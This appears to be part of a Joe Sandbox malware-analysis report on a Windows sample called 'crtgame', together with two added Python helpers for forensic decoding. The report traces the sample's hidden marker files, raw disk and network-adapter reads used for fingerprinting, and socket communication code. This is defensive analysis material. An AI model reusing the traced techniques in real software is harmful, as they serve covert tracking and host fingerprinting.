                                                                          • Instruction Fuzzy Hash: 7E210372940208BFE710AAA4AC88FAFF76CDB856A4F104495FA05A71C1DA741E499BB1
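The sequence above builds a path under the CSIDL_COMMON_APPDATA folder (0x23, C:\ProgramData on this system), reads 8 bytes from it with GENERIC_READ and OPEN_EXISTING, calls __time64, and writes 8 bytes back with GENERIC_WRITE, CREATE_ALWAYS and attributes 0x22 (FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_ARCHIVE); the names visible in the dump are rc.dat and ts.dat. That is the shape of a hidden timestamp marker, which matters on a live host because the file outlives the process and dates a run. The helper below is an added example and not part of this report: it assumes the 8 bytes are a little-endian signed 64-bit time_t written verbatim from __time64, decodes them to a UTC timestamp, rejects values that cannot be a run time, and walks a directory for matching 8-byte .dat files. The plausibility window, the walk and the constructed sample bytes are this example's own.

```python
import os
import struct
from datetime import datetime, timezone
from typing import Iterator, Optional, Tuple

# Assumption: the marker is the raw output of __time64 (little-endian int64 seconds since 1970).
# Values outside this window are treated as "not a marker" (e.g. an all-zero file).
PLAUSIBLE_FROM = datetime(2015, 1, 1, tzinfo=timezone.utc)
PLAUSIBLE_TO = datetime(2035, 1, 1, tzinfo=timezone.utc)


def decode_time64_marker(data: bytes) -> Optional[datetime]:
    """Return the UTC time an 8-byte __time64 marker encodes, or None if the
    size is wrong or the value is outside the plausible window."""
    if len(data) != 8:
        return None
    (t,) = struct.unpack("<q", data)
    try:
        when = datetime.fromtimestamp(t, tz=timezone.utc)
    except (OverflowError, OSError, ValueError):
        return None
    if not (PLAUSIBLE_FROM <= when < PLAUSIBLE_TO):
        return None
    return when


def encode_time64_marker(when: datetime) -> bytes:
    """Inverse of decode_time64_marker; used here to build constructed test data."""
    return struct.pack("<q", int(when.timestamp()))


def age_in_seconds(when: datetime, now: Optional[datetime] = None) -> int:
    """Seconds between the marker and 'now' (defaults to the current UTC time)."""
    now = now or datetime.now(timezone.utc)
    return int((now - when).total_seconds())


def find_markers(root: str) -> Iterator[Tuple[str, datetime]]:
    """Walk a tree (e.g. C:\\ProgramData) for 8-byte .dat files that decode as markers.
    Hidden files are returned by os.walk like any other, so no attribute check is needed."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".dat"):
                continue
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) != 8:
                    continue
                with open(path, "rb") as fh:
                    when = decode_time64_marker(fh.read(8))
            except OSError:
                continue
            if when is not None:
                yield path, when


# Constructed sample: the bytes __time64() == 1734000000 (2024-12-12T10:40:00Z) leaves behind.
SAMPLE_RC_DAT = bytes([0x80, 0xBD, 0x5A, 0x67, 0x00, 0x00, 0x00, 0x00])


if __name__ == "__main__":
    when = decode_time64_marker(SAMPLE_RC_DAT)
    print("sample marker:", when.isoformat() if when else None)
    for path, stamp in find_markers(os.environ.get("ProgramData", ".")):
        print(path, stamp.isoformat(), f"{age_in_seconds(stamp)}s ago")
```

Because the marker is rewritten with CREATE_ALWAYS on each pass through this function, the decoded value should be read as "last time this code path ran", and the NTFS creation time of the file, not its content, is the better witness for the first run.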

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02BC1D11
                                                                          • GetLastError.KERNEL32 ref: 02BC1D23
                                                                            • Part of subcall function 02BC1712: __EH_prolog.LIBCMT ref: 02BC1717
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02BC1D59
                                                                          • GetLastError.KERNEL32 ref: 02BC1D6B
                                                                          • __beginthreadex.LIBCMT ref: 02BC1DB1
                                                                          • GetLastError.KERNEL32 ref: 02BC1DC6
                                                                          • CloseHandle.KERNEL32(00000000), ref: 02BC1DDD
                                                                          • CloseHandle.KERNEL32(00000000), ref: 02BC1DEC
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BC1E14
                                                                          • CloseHandle.KERNELBASE(00000000), ref: 02BC1E1B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                          • String ID: thread$thread.entry_event$thread.exit_event
                                                                          • API String ID: 831262434-3017686385
                                                                          • Opcode ID: f12a34fe4794afe9a0f4ec957706413da8dbcc54c2ca978d4addfda44e8a92a7
                                                                          • Instruction ID: 6be00e7537f34e553dcb3c652c03c0dc0d93d26b3722401ffe3cb47f7acd447e
                                                                          • Opcode Fuzzy Hash: f12a34fe4794afe9a0f4ec957706413da8dbcc54c2ca978d4addfda44e8a92a7
                                                                          • Instruction Fuzzy Hash: 3F3172719043019FDB00EF24C884B6BBBA5EF84754F2049ADF8599B292DB709949CF92

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC4CB6
                                                                          • RtlEnterCriticalSection.NTDLL(02BF73D8), ref: 02BC4CE2
                                                                          • RtlLeaveCriticalSection.NTDLL(02BF73D8), ref: 02BC4CEE
                                                                            • Part of subcall function 02BC4B18: __EH_prolog.LIBCMT ref: 02BC4B1D
                                                                            • Part of subcall function 02BC4B18: InterlockedExchange.KERNEL32(?,00000000), ref: 02BC4C1D
                                                                          • RtlEnterCriticalSection.NTDLL(02BF73D8), ref: 02BC4DBE
                                                                          • RtlLeaveCriticalSection.NTDLL(02BF73D8), ref: 02BC4DC4
                                                                          • RtlEnterCriticalSection.NTDLL(02BF73D8), ref: 02BC4DCB
                                                                          • RtlLeaveCriticalSection.NTDLL(02BF73D8), ref: 02BC4DD1
                                                                          • RtlEnterCriticalSection.NTDLL(02BF73D8), ref: 02BC4FD2
                                                                          • RtlLeaveCriticalSection.NTDLL(02BF73D8), ref: 02BC4FD8
                                                                          • RtlEnterCriticalSection.NTDLL(02BF73D8), ref: 02BC4FE3
                                                                          • RtlLeaveCriticalSection.NTDLL(02BF73D8), ref: 02BC4FEC
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                          • String ID:
                                                                          • API String ID: 2062355503-0
                                                                          • Opcode ID: a30579d271f891cc24b018dd40aff02045f6c01afeca04cc0f4c0b2cb4c3bb8e
                                                                          • Instruction ID: 4d63518c49109d4c0f632efdc9ad2eb72d9f53e12bc857f086efaa2a2c9caffd
                                                                          • Opcode Fuzzy Hash: a30579d271f891cc24b018dd40aff02045f6c01afeca04cc0f4c0b2cb4c3bb8e
                                                                          • Instruction Fuzzy Hash: 5EB12A71D0425DDEEF25DF94C850BEEBBB5AF04314F2440DAE809BA280DBB46A49CF61

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 02BC2706
                                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02BC272B
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02BE5553), ref: 02BC2738
                                                                            • Part of subcall function 02BC1712: __EH_prolog.LIBCMT ref: 02BC1717
                                                                          • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02BC2778
                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 02BC27D9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                          • String ID: timer
                                                                          • API String ID: 4293676635-1792073242
                                                                          • Opcode ID: 262ea38c863b12a4ae72503f1e2e8b9d77e61f64a4470d9ccc950f5716a054fe
                                                                          • Instruction ID: fdd82ba0fa57248a6ceec9053b8f94b4c5ebe53c397e783ebb603765a25c44f8
                                                                          • Opcode Fuzzy Hash: 262ea38c863b12a4ae72503f1e2e8b9d77e61f64a4470d9ccc950f5716a054fe
                                                                          • Instruction Fuzzy Hash: 43319EB1904705EFD710DF25C884B56BBE8FB48764F104AAEF85987A81EB70E914CFA1

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 02BCF29C: CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000,?), ref: 02BCF2BB
                                                                            • Part of subcall function 02BCF29C: DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,00000000,00000000), ref: 02BCF2F9
                                                                            • Part of subcall function 02BCF29C: GetLastError.KERNEL32 ref: 02BCF35A
                                                                            • Part of subcall function 02BCF29C: CloseHandle.KERNELBASE(?), ref: 02BCF391
                                                                            • Part of subcall function 02BCF3A0: LoadLibraryA.KERNEL32(iphlpapi.dll,?), ref: 02BCF3B6
                                                                            • Part of subcall function 02BCF3A0: GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02BCF3CF
                                                                            • Part of subcall function 02BCF3A0: GetAdaptersInfo.IPHLPAPI(?,00000000,?,00000000), ref: 02BCF3F4
                                                                            • Part of subcall function 02BCF3A0: FreeLibrary.KERNEL32(00000000), ref: 02BCF47D
                                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104,?,00000000,00000000), ref: 02BCF235
                                                                          • CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 02BCF256
                                                                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02BCF26A
                                                                          • CloseHandle.KERNEL32(00000000), ref: 02BCF273
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandleLibrary$AdaptersAddressControlDeviceDirectoryErrorFreeInfoLastLoadProcTimeWindows
                                                                          • String ID: tLVh
                                                                          • API String ID: 1378705229-319918027
                                                                          • Opcode ID: 43e2410ba67e004218d0d169fa05df35a6a609e130acca3181eca3c78123ce83
                                                                          • Instruction ID: 5bc53ae956bf314f252136f3785123792d38d43040ede923276c87e2e5152e00
                                                                          • Opcode Fuzzy Hash: 43e2410ba67e004218d0d169fa05df35a6a609e130acca3181eca3c78123ce83
                                                                          • Instruction Fuzzy Hash: E5116375D00328ABDB10DBA5DC48EEEBB7EEB49750F10069AF505AB184DB705A49CB90

                                                                          Control-flow Graph

Control-flow graph of the function at 02BC29EE (rendered graph omitted; block list recovered from the page data):
• Blocks with API calls: 2bc2a39-2bc2a4c WSASetLastError, closesocket, call 2bc9e92; 2bc2a7b-2bc2aad ioctlsocket, WSASetLastError, closesocket, call 2bc9e92.
• Blocks with internal calls: 2bc2a17-2bc2a36 call 2bd0510, call 2bc2f50; 2bc2a57-2bc2a5f call 2bd0510; 2bc2a69-2bc2a71 call 2bd0510; 2bc2ab3-2bc2abb call 2bd0510.
• Other blocks: 2bc29ee-2bc2a06 (entry), 2bc2a0c-2bc2a10, 2bc2a12-2bc2a15, 2bc2a51-2bc2a55, 2bc2a61-2bc2a67, 2bc2a73-2bc2a79, 2bc2aaf-2bc2ab1, 2bc2abe-2bc2ac6 (exit).
• Edges of note: the entry block goes to 2bc2a0c or directly to 2bc2ab3; the first closesocket block is reached from 2bc2a0c, 2bc2a12 and 2bc2a17 and continues to 2bc2a51; the second (ioctlsocket, closesocket) block is reached from 2bc2a61 and 2bc2a73 and continues to 2bc2aaf; 2bc2aaf and 2bc2ab3 lead to the exit block.
                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000,?,?,?,00000006,?,?), ref: 02BC2A3B
                                                                          • closesocket.WS2_32(?), ref: 02BC2A42
                                                                          • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02BC2A89
                                                                          • WSASetLastError.WS2_32(00000000), ref: 02BC2A97
                                                                          • closesocket.WS2_32(?), ref: 02BC2A9E
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLastclosesocket$ioctlsocket
                                                                          • String ID:
                                                                          • API String ID: 1561005644-0
                                                                          • Opcode ID: 00bc60be115ac93a63e5a37074c48ef999d16425e17e1d2258e1fc837d58864a
                                                                          • Instruction ID: 3c89cf4267418a3a6690ae5e8c0374081831d5f51036ec607defef925cbc2eed
                                                                          • Opcode Fuzzy Hash: 00bc60be115ac93a63e5a37074c48ef999d16425e17e1d2258e1fc837d58864a
                                                                          • Instruction Fuzzy Hash: F121B875E00205ABEB20ABB8894476EB7E9DF44315F2149EDF855C7241FB7089418B61

                                                                          Control-flow Graph

Control-flow graph of the function at 02BC1BA7 (rendered graph omitted; block list recovered from the page data):
• Blocks with API calls: 2bc1ba7-2bc1bcf call 2be4df0, RtlEnterCriticalSection (entry); 2bc1be9-2bc1bf7 RtlLeaveCriticalSection, call 2bcdcbc; 2bc1bfa-2bc1c20 RtlEnterCriticalSection; 2bc1c55-2bc1c6e RtlLeaveCriticalSection (exit).
• Blocks with internal calls: 2bc1bd4-2bc1be0 call 2bc1b79; 2bc1c22-2bc1c2f call 2bc1b79.
• Other blocks: 2bc1bd1, 2bc1be2-2bc1be7, 2bc1c31, 2bc1c34-2bc1c36, 2bc1c38-2bc1c43, 2bc1c45-2bc1c4b, 2bc1c4d-2bc1c51.
• Edges of note: two loops, each held under the critical section: 2bc1bd4 (call 2bc1b79) -> 2bc1be2 -> back to 2bc1bd4, and 2bc1c22 (call 2bc1b79) -> 2bc1c31 -> 2bc1c34 -> back to 2bc1c22; the first loop exits to 2bc1be9 (leave, call 2bcdcbc), after which 2bc1bfa re-enters the section and starts the second; 2bc1bd4, 2bc1c45 and 2bc1c4d can go straight to the exit block.
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC1BAC
                                                                          • RtlEnterCriticalSection.NTDLL ref: 02BC1BBC
                                                                          • RtlLeaveCriticalSection.NTDLL ref: 02BC1BEA
                                                                          • RtlEnterCriticalSection.NTDLL ref: 02BC1C13
                                                                          • RtlLeaveCriticalSection.NTDLL ref: 02BC1C56
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave$H_prolog
                                                                          • String ID:
                                                                          • API String ID: 1633115879-0
                                                                          • Opcode ID: ae8de9fd929d0427be2d1f10662159e9d80ff5dcd49eebaf035ec61638bf5c79
                                                                          • Instruction ID: 577f2008fbfa66ba010584e2632c30410eb31e33a0d04971255a184ad6afdd8b
                                                                          • Opcode Fuzzy Hash: ae8de9fd929d0427be2d1f10662159e9d80ff5dcd49eebaf035ec61638bf5c79
                                                                          • Instruction Fuzzy Hash: 28218B75A10204EFDB15CF68C4447AABBB5FF48724F20858DE819AB302DB74E905DBE0

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000,?,?,?,?,?,02BC358B,?,?,?,?,?,?,?,02BC8FA9,?), ref: 02BC2EEE
                                                                          • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02BC2EFD
                                                                          • WSAGetLastError.WS2_32(?,02BC358B,?,?,?,?,?,?,?,02BC8FA9,?,?,?,00000001,00000006,?), ref: 02BC2F0C
                                                                          • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02BC2F36
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$Socketsetsockopt
                                                                          • String ID:
                                                                          • API String ID: 2093263913-0
                                                                          • Opcode ID: 2dc5e125baa6740694261efcfd5a1cfc7b510410c15cecf6585b1a57d07b8a3d
                                                                          • Instruction ID: 7b70dd4b0d803898c3907132834c30f75cd7d2e690c62492a369817e5a7f6569
                                                                          • Opcode Fuzzy Hash: 2dc5e125baa6740694261efcfd5a1cfc7b510410c15cecf6585b1a57d07b8a3d
                                                                          • Instruction Fuzzy Hash: 95014D71940304FBDF205F65DC88B9ABBA9DF85771F008995F914DB151D77089009BA1
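The numeric arguments in the socket-setup calls above and in the ioctlsocket call earlier in this section decode to a specific configuration: WSASocketA is called with dwFlags 1 (WSA_FLAG_OVERLAPPED, the flag required for overlapped I/O such as the completion port created elsewhere in this dump), setsockopt uses level 0x29 (41, IPPROTO_IPV6) and optname 0x1B (27, IPV6_V6ONLY) with a 4-byte option, and ioctlsocket's 0x8004667E is FIONBIO, which switches blocking mode on or off. The optval pointer is not resolved in the report, so whether V6ONLY is being set or cleared cannot be read off this page. The script below is an added example and not part of the report: it rebuilds the BSD-style _IOW/_IOR encoding Winsock uses for ioctlsocket codes, decodes the WSASocket flags and the setsockopt identifiers, and applies them to the values seen here. The lookup tables are this example's own and deliberately cover only constants it can vouch for.

```python
from typing import Dict, List

# ioctlsocket codes (winsock2.h, BSD heritage): direction bits, parameter size
# masked to 7 bits, a group letter and a command number.
IOCPARM_MASK = 0x7F
IOC_VOID, IOC_OUT, IOC_IN = 0x20000000, 0x40000000, 0x80000000
IOC_INOUT = IOC_IN | IOC_OUT
SIZEOF_U_LONG = 4  # u_long on Windows is 32-bit in both x86 and x64 processes


def _io(direction: int, group: str, num: int, size: int) -> int:
    return (direction | ((size & IOCPARM_MASK) << 16) | (ord(group) << 8) | num) & 0xFFFFFFFF


def _iow(group: str, num: int, size: int) -> int:
    return _io(IOC_IN, group, num, size)


def _ior(group: str, num: int, size: int) -> int:
    return _io(IOC_OUT, group, num, size)


FIONBIO = _iow("f", 126, SIZEOF_U_LONG)    # 0x8004667E
FIONREAD = _ior("f", 127, SIZEOF_U_LONG)   # 0x4004667F
SIOCATMARK = _ior("s", 7, SIZEOF_U_LONG)   # 0x40047307
KNOWN_SOCKET_IOCTLS = {FIONBIO: "FIONBIO", FIONREAD: "FIONREAD", SIOCATMARK: "SIOCATMARK"}
DIRECTIONS = {IOC_IN: "IOC_IN", IOC_OUT: "IOC_OUT", IOC_INOUT: "IOC_INOUT", IOC_VOID: "IOC_VOID"}


def decode_socket_ioctl(code: int) -> Dict[str, object]:
    """Split an ioctlsocket command into direction, parameter size, group and number."""
    direction = code & (IOC_IN | IOC_OUT | IOC_VOID)
    return {
        "code": code,
        "name": KNOWN_SOCKET_IOCTLS.get(code),
        "direction": DIRECTIONS.get(direction, f"0x{direction:08X}"),
        "size": (code >> 16) & IOCPARM_MASK,
        "group": chr((code >> 8) & 0xFF),
        "number": code & 0xFF,
    }


WSA_FLAGS = {
    0x01: "WSA_FLAG_OVERLAPPED", 0x02: "WSA_FLAG_MULTIPOINT_C_ROOT", 0x04: "WSA_FLAG_MULTIPOINT_C_LEAF",
    0x08: "WSA_FLAG_MULTIPOINT_D_ROOT", 0x10: "WSA_FLAG_MULTIPOINT_D_LEAF",
    0x40: "WSA_FLAG_ACCESS_SYSTEM_SECURITY", 0x80: "WSA_FLAG_NO_HANDLE_INHERIT",
}


def decode_wsa_flags(flags: int) -> List[str]:
    """Name every known bit in a WSASocket dwFlags value; unknown bits are kept as hex."""
    names = [name for bit, name in sorted(WSA_FLAGS.items()) if flags & bit]
    unknown = flags & ~sum(WSA_FLAGS)
    if unknown:
        names.append(f"0x{unknown:X}")
    return names


SOCKOPT_LEVELS = {0xFFFF: "SOL_SOCKET", 0: "IPPROTO_IP", 6: "IPPROTO_TCP", 41: "IPPROTO_IPV6"}
SOCKOPT_NAMES = {
    (0xFFFF, 0x0004): "SO_REUSEADDR", (0xFFFF, 0x0008): "SO_KEEPALIVE",
    (6, 1): "TCP_NODELAY", (41, 27): "IPV6_V6ONLY",
}


def decode_setsockopt(level: int, optname: int, optlen: int) -> Dict[str, object]:
    """Name the level/optname pair; a 4-byte option is the usual int/BOOL shape."""
    return {
        "level": SOCKOPT_LEVELS.get(level, str(level)),
        "optname": SOCKOPT_NAMES.get((level, optname), str(optname)),
        "optlen": optlen,
        "int_sized": optlen == 4,
    }


def describe_socket_setup(wsa_flags: int, level: int, optname: int, optlen: int, ioctl: int) -> Dict[str, object]:
    """Combine the three decoders for one socket's setup sequence."""
    io = decode_socket_ioctl(ioctl)
    return {
        "flags": decode_wsa_flags(wsa_flags),
        "overlapped": bool(wsa_flags & 0x01),
        "sockopt": decode_setsockopt(level, optname, optlen),
        "ioctl": io,
        "toggles_blocking_mode": io["name"] == "FIONBIO",
    }


if __name__ == "__main__":
    # The values from this report: WSASocketA(..., 1), setsockopt(s, 0x29, 0x1B, p, 4), ioctlsocket(s, 0x8004667E, p)
    for key, value in describe_socket_setup(1, 0x29, 0x1B, 4, 0x8004667E).items():
        print(f"{key}: {value}")
```

An overlapped socket, an IPV6_V6ONLY option and an FIONBIO toggle together describe a non-blocking, completion-port-driven client stack; the resolved optval, which only a debugger or an API-monitor trace with dereferenced pointers will show, decides whether it is dual-stack.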

                                                                          Control-flow Graph

Control-flow graph of the function at 02BC2DB5 (rendered graph omitted; block list recovered from the page data):
• Blocks with API calls: 2bc2e54-2bc2e97 WSASetLastError, select, call 2bc9e92.
• Blocks with internal calls: 2bc2dca-2bc2dd2 call 2bd0510; 2bc2def-2bc2dfa call 2bd0510; 2bc2dfc-2bc2e07 call 2bc2d39 (the WSASend wrapper listed below); 2bc2e1a-2bc2e35 call 2bd0510, call 2bc166f; 2bc2e37-2bc2e52 call 2bd0510, call 2bc166f; 2bc2e99-2bc2ea4 call 2bd0510; 2bc2ea8-2bc2eb3 call 2bd0510; 2bc2ebe-2bc2ed2 call 2bc2d39.
• Other blocks: 2bc2db5-2bc2dc8 (entry), 2bc2dd8, 2bc2ddb, 2bc2ddd-2bc2de3 (exit), 2bc2de4-2bc2de8, 2bc2dea-2bc2ded, 2bc2e0c-2bc2e11, 2bc2e13, 2bc2e16-2bc2e18, 2bc2ea6, 2bc2eb6-2bc2eb8, 2bc2ed8.
• Edges of note: the first call to 2bc2d39 at 2bc2dfc continues via 2bc2e0c either to the exit block or to 2bc2e13 -> 2bc2e16; from 2bc2e16 the select block is reached through 2bc2e1a or 2bc2e37, and is followed (via 2bc2e99 or 2bc2ea6/2bc2eb6) by the second call to 2bc2d39 at 2bc2ebe, which loops back to 2bc2e16 or falls through 2bc2ed8 to the exit block; the checks at 2bc2dca, 2bc2def, 2bc2e16, 2bc2e37 and 2bc2eb6 route to 2bc2dd8/2bc2ddb and then to the exit block.
                                                                          APIs
                                                                            • Part of subcall function 02BC2D39: WSASetLastError.WS2_32(00000000,?,?,00000001,?,?,02BC3390,00000001,?,00000000,?,?,?,?,?), ref: 02BC2D47
                                                                            • Part of subcall function 02BC2D39: WSASend.WS2_32(?,?,?,00000000,00000000,00000000,00000000), ref: 02BC2D5C
                                                                          • WSASetLastError.WS2_32(00000000,00000000,?,?), ref: 02BC2E6D
                                                                          • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02BC2E83
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$Sendselect
                                                                          • String ID: 3'
                                                                          • API String ID: 2958345159-280543908
                                                                          • Opcode ID: 7dc23ddb5902c63277ad4562c3e6d25f95aa82f1970678c77e6564c7cbaedc1a
                                                                          • Instruction ID: 79be9eeab886f1cad7e68b127bb38825e3e4c2b7ccc3fad308a279c891a68ddd
                                                                          • Opcode Fuzzy Hash: 7dc23ddb5902c63277ad4562c3e6d25f95aa82f1970678c77e6564c7cbaedc1a
                                                                          • Instruction Fuzzy Hash: 1B31BEB0E1020AAFDF10EF64C8547EEBBAAEF15358F2049DEDC0497241EBB095518FA1

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000,?,?), ref: 02BC2AEA
                                                                          • connect.WS2_32(00000010,?,?), ref: 02BC2AF5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLastconnect
                                                                          • String ID: 3'
                                                                          • API String ID: 374722065-280543908
                                                                          • Opcode ID: 9d08e0b79a97ca70bcd09b60e61121a805b88e8a17a8b2b0572b59af2e0518fb
                                                                          • Instruction ID: bb28cb34c3969284a1373eeca1e63d88bc9c5c9a42cbde6a3d95fc1aa4d21f6f
                                                                          • Opcode Fuzzy Hash: 9d08e0b79a97ca70bcd09b60e61121a805b88e8a17a8b2b0572b59af2e0518fb
                                                                          • Instruction Fuzzy Hash: A321A771E00208ABDF14BFB4C4546EEBBBAEF44324F2085DDDC1897281EBB44A018FA1

                                                                          Control-flow Graph

                                                                          • Control-flow graph (image): basic blocks 02BC353E-02BC3697, calling CreateIoCompletionPort and GetLastError; internal calls to 02BE4DF0, 02BC2EDD, 02BC1996, 02BD0510, 02BC29EE, 02BCD87F and 02BC143F
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog
                                                                          • String ID:
                                                                          • API String ID: 3519838083-0
                                                                          • Opcode ID: 43f933efab0f934e5d31a19549ff00aec76cdb70d56fd075dac357bd0e1c97ec
                                                                          • Instruction ID: a255c463a5d222d5b1246b6bde48af29cd5440e617bd7ed7754bfc048d0d640b
                                                                          • Opcode Fuzzy Hash: 43f933efab0f934e5d31a19549ff00aec76cdb70d56fd075dac357bd0e1c97ec
                                                                          • Instruction Fuzzy Hash: 39511DB1904216DFCB05DF58D5406AABBF1FF08324F24C5AEE8699B381D7749911CFA1

                                                                          Control-flow Graph

                                                                          • Control-flow graph (image): basic blocks 02BC369A-02BC373C, calling InterlockedIncrement, WSARecv and WSAGetLastError; internal calls to 02BC247D and 02BC2420
                                                                          APIs
                                                                          • InterlockedIncrement.KERNEL32(?), ref: 02BC36A7
                                                                            • Part of subcall function 02BC2420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02BC2432
                                                                            • Part of subcall function 02BC2420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02BC2445
                                                                            • Part of subcall function 02BC2420: RtlEnterCriticalSection.NTDLL(?), ref: 02BC2454
                                                                            • Part of subcall function 02BC2420: InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2469
                                                                            • Part of subcall function 02BC2420: RtlLeaveCriticalSection.NTDLL(?), ref: 02BC2470
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                          • String ID:
                                                                          • API String ID: 1601054111-0
                                                                          • Opcode ID: d23c053c92527091a12a857d40ebe52f32cf79756355093a78f13a6297377e1f
                                                                          • Instruction ID: 680bd115d697a3b1866a29922c50e7cd236f156eea9a8b32ff7fd65862e773d9
                                                                          • Opcode Fuzzy Hash: d23c053c92527091a12a857d40ebe52f32cf79756355093a78f13a6297377e1f
                                                                          • Instruction Fuzzy Hash: 9311C4B5104208EBDF219E14DC85FAA3BA5EF00355F6085AAFE568A290CB35D860DB94
